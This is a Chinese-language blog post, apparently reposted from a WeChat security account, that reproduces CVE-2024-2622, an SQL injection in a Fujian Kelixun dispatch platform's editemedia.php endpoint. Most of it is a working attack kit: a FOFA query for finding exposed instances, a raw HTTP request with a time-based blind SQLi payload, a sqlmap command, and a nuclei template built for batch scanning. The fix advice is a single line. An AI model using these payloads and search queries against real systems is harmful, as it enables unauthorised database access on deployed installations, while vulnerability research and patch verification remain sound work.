CVE-2024-2622漏洞复现（附poc）

admin

102523
文章

87
评论

2024年3月22日16:17:56评论53 views字数 2162阅读7分12秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

福建科立讯通信指挥调度平台editemedia.php sql注入漏洞

—

漏洞影响

福建科立讯通信指挥调度平台 <= 20240318

CVE-2024-2622漏洞复现（附poc）

—

漏洞描述

在20240318之前的福建科立讯通信指挥调度平台中发现了一个漏洞。该漏洞被归类为关键级别，影响文件/api/client/editemedia.php的未知部分。通过操纵参数number/enterprise_uuid可导致SQL注入。攻击可能会远程发起。

—

FOFA搜索语句

body="app/structure/departments.php" || app="指挥调度管理平台"

CVE-2024-2622漏洞复现（附poc）

—

漏洞复现

向靶场发送如下数据包进行时间盲注

GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybkUpgrade-Insecure-Requests: 1

响应内容如下

CVE-2024-2622漏洞复现（附poc）

漏洞复现成功

盲注手工搞太费劲了，使用sqlmap试一下

sqlmap -u "http://x.x.x.x/api/client/editemedia.php?enterprise_uuid=1"

CVE-2024-2622漏洞复现（附poc）

—

批量漏洞扫描 poc

nuclei poc文件内容如下

id: CVE-2024-2622info:  name: 福建科立讯通信指挥调度平台editemedia.php sql注入漏洞  author: fgz  severity: high  description: '在20240318之前的福建科立讯通信指挥调度平台中发现了一个漏洞。该漏洞被归类为关键级别，影响文件/api/client/editemedia.php的未知部分。通过操纵参数number/enterprise_uuid可导致SQL注入。攻击可能会远程发起。'  tags: 2024,sqli  metadata:    max-request: 1    fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台"    verified: truerequests:  - raw:      - |-        GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate, br        Connection: close        Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk        Upgrade-Insecure-Requests: 1    matchers:      - type: dsl        dsl:          - "status_code == 200 && duration>=5 && duration<=6 && contains(body,'msg')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-2622.yaml -u http://x.x.x.x/

CVE-2024-2622漏洞复现（附poc）

—

修复建议

升级到最新版本。

—

新粉丝

原文始发于微信公众号（AI与网安）：CVE-2024-2622漏洞复现（附poc）

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-2622漏洞复现（附poc）

某单位网址未授权导致发生的视频信息泄露

CVE-2024-4040

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

发表评论

在线咨询

微信